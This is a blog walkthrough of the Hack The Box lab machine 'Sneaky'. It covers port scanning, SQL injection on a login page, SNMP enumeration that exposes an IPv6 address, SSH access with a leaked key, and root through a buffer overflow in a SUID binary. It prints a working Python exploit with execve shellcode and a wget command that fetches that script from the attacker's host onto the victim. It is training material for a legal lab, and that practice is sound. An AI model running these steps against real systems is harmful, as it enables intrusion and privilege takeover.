---
title: "Sneaky Hackthebox"
date: 2021-04-04T18:16:28+02:00
draft: false
image: "/static/HACKING/sneaky-icon.png"
categories:
    - Hack-The-Box
---

![<- Not working](/static/HACKING/sneaky-index.jpg)

# [*] INDEX: 

- [BOX INFO](#-box-info--)
- [GAINING ACCESS](#-part-1---gain-access)
- [PRIVILEGE ESCALATION](#-part-2---privesc)

# [+] BOX INFO 💻 :

```
Operative System : Linux 🐧
Difficulty : Medium 🌓
Owner : trickster0
IP : 10.10.10.20
```
# [+] PART 1 - GAIN ACCESS

The first step is scanning machine's ports with nmap:

> [nmap -p- --open -T5 -n 10.10.10.20](https://explainshell.com/explain?cmd=nmap+-p-+--open+-T5+-n+10.10.10.20)

```
PORT   STATE SERVICE
80/tcp open  http
``` 

Interesting... ssh is disabled... Let's get a deeper scan on the port 80.

> [nmap -sS -sV -sC -p80 10.10.10.20](https://explainshell.com/explain?cmd=nmap+-sS+-sV+-sC+-p80+10.10.10.20)

```
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Under Development!
```

Here we just can point out the http server, so, let's check it : 

![<- Not working](/static/HACKING/sneaky-1.png)

Let's fuzz the website, in my case I'll be using `wfuzz` : 

> wfuzz -c -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt --hc=404 -u http://10.10.10.20/FUZZ -L

```s
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.20/FUZZ
Total requests: 207643

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                                   
=====================================================================
                          
000000810:   200        14 L     32 W       464 Ch      "dev"                                                                                                                                                                     
000041849:   200        11 L     20 W       183 Ch      "http://10.10-10.20/" 
```

Let's go to `dev`:

![<- Not working](/static/HACKING/sneaky-2.png)

There is a login page, let's try `admin:admin` :

![<- Not working](/static/HACKING/sneaky-3.png)

![<- Not working](/static/HACKING/sneaky-4.png)

Didn't work :sweat_smile: ...

Let's try to put a single quote and see what happens :

![<- Not working](/static/HACKING/sneaky-5.png)

![<- Not working](/static/HACKING/sneaky-6.png)

It crashes... So this is vulnerable to SQL injection, let's follow the [post](https://ironhackers.es/herramientas/sqli/) I put in [lazy](https://maikypedia.gitlab.io/hack-the-box/lazy-hackthebox/s):

![<- Not working](/static/HACKING/sneaky-7.png)

![<- Not working](/static/HACKING/sneaky-8.png)

Nice, we got the first username and a key, let's see what's that :

![<- Not working](/static/HACKING/sneaky-9.png)

We can download the key :

> [wget http://10.10.10.20/dev/sshkeyforadministratordifficulttimes](https://explainshell.com/explain?cmd=wget+http%3A%2F%2F10.10.10.20%2Fdev%2Fsshkeyforadministratordifficulttimes)

But we don't have port 22 for ssh... This made me think that nmap wasn't reporting me all the open ports, I ran nmap several times but nothing new, then I tried about scanning also UDP ports...

> [nmap -sU --top-ports 100 10.10.10.20](https://explainshell.com/explain?cmd=nmap+-sU+--top-ports+100+10.10.10.20)

```
PORT    STATE         SERVICE
161/udp open|filtered snmp
```

Oh :grimacing:, this is interesting, `snmp` means "Simple Network Management Protocol" this service manages nodes within a network, we can ennumerate this service using `snmpwalk`, a tool used for scanning multiple nodes at once :

> snmpwalk -v 2c -c public 10.10.10.20 | grep 10.10.10.20

![<- Not working](/static/HACKING/sneaky-10.png)

Hmm this is not really readable, we're reading the info with `mib` this stands for "Management Information Base", to make this readable we have to install `snmp-mibs-downloader` .

> [apt install snmp-mibs-downloader](https://explainshell.com/explain?cmd=apt+install+snmp-mibs-downloader)

And now let's comment mib :

![<- Not working](/static/HACKING/sneaky-11.png)

![<- Not working](/static/HACKING/sneaky-12.png)

And let's run `snmpwalk` again :

> snmpwalk -v 2c -c public 10.10.10.20

![<- Not working](/static/HACKING/sneaky-13.png)

So `dead:beef:0000:0000:0250:56ff:feb9:3697` is the IPV6 ip address, let's ping it:

![<- Not working](/static/HACKING/sneaky-14.png)

We could have also use the tool called [Enyx](https://github.com/trickster0/Enyx), this tool is made by `trickster0` (the owner of the machine), so let's run it :

Quote : To make this script run we have to uncomment mib :

![<- Not working](/static/HACKING/sneaky-11.png)

Now we run Enyx :

> python enyx.py 2c public 10.10.10.20

![<- Not working](/static/HACKING/sneaky-25.png)

Nice, let's run `nmap` again against this IP : 

> [nmap -p- --open -T5 -n -6  dead:beef:0000:0000:0250:56ff:feb9:3697](https://explainshell.com/explain?cmd=nmap+-p-+--open+-T5+-n+-6++dead%3Abeef%3A0000%3A0000%3A0250%3A56ff%3Afeb9%3A3697)

```
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

So, ssh is enabled, let's login with the id_rsa we already have :

> [ssh -i sshkeyforadministratordifficulttimes  thrasivoulos@dead:beef:0000:0000:0250:56ff:feb9:3697](https://explainshell.com/explain?cmd=ssh+-i+sshkeyforadministratordifficulttimes++thrasivoulos%40dead%3Abeef%3A0000%3A0000%3A0250%3A56ff%3Afeb9%3A3697)

![<- Not working](/static/HACKING/sneaky-15.png)

And we're in :sunglasses: !

# [+] PART 2 - PRIVESC

I was enumerating the system until I listed the SUID files and I found in this :

> [find \-perm -4000 2>/dev/null](https://explainshell.com/explain?cmd=find+%5C-perm+-4000+2%3E%2Fdev%2Fnull)

![<- Not working](/static/HACKING/sneaky-16.png)

Let's run it :

![<- Not working](/static/HACKING/sneaky-17.png)

So, as I though, this is definetly vulnerable to `Buffer Overflow`, this is pretty similar to the[October machine](https://maikypedia.gitlab.io/hack-the-box/october-hackthebox/#-part-2---privesc) (All this recognition process is better explained there).

First of all let's get when where does the program crash :

> /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 500

```
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Agh8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao06Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq
```

This creates a pattern that does not repeat. Let's run this in the victim machine with gdb :

> r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Agh8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao06Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq

![<- Not working](/static/HACKING/sneaky-18.png)

![<- Not working](/static/HACKING/sneaky-19.png)

So the script crashes at `0x316d4130`, let's locate this and get the offset :

> /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x316d4130

![<- Not working](/static/HACKING/sneaky-20.png)

Let's share the file :

> [base64 /usr/local/bin/chal > chal.base64](https://explainshell.com/explain?cmd=base64+%2Fusr%2Flocal%2Fbin%2Fchal+%3E+chal.base64)

> [python3 -m http.server](https://explainshell.com/explain?cmd=python3+-m+http.server)

![<- Not working](/static/HACKING/sneaky-21.png)

And download it from our local machine :

> [wget 10.10.10.20:8000/chal.base64](https://explainshell.com/explain?cmd=wget+10.10.10.20%3A8000%2Fchal.base64)

> [base64 -d chal.base64 > chal](https://explainshell.com/explain?cmd=base64+-d+chal.base64+%3E+chal+)

![<- Not working](/static/HACKING/sneaky-22.png)

Let's run `checksec` to check the properties of executables :

> checksec  --file=chal

![<- Not working](/static/HACKING/sneaky-23.png)

After many attempts trying to exploit the BOF I have built a script to get the payload (I got the shelcode from [here](http://shell-storm.org/shellcode/files/shellcode-827.php)):

```python
#!/usr/bin/python

import struct 

trash_offset = 362

shell_code = "\x31\xc0\x50\x68\x2f\x2f\x73"
shell_code += "\x68\x68\x2f\x62\x69\x6e\x89"
shell_code += "\xe3\x89\xc1\x89\xc2\xb0\x0b"
shell_code += "\xcd\x80\x31\xc0\x40\xcd\x80";

nop_sled = "\x90" * (trash_offset-len(shell_code))
eip_value = "\xb0\xf7\xff\xbf"

payload = nop_sled + shell_code + eip_value

print payload
```

### From our local machine :

> [python3 -m http.server](https://explainshell.com/explain?cmd=python3+-m+http.server)

### From the victim machine : 

> [wget 10.10.14.18:8000/script.py](https://explainshell.com/explain?cmd=wget+10.10.14.18%3A8000%2Fscript.py)

And then we run :

> ./../../usr/local/bin/chal $(python script.py)

![<- Not working](/static/HACKING/sneaky-24.png)

# THANKS FOR READING 😊 !!



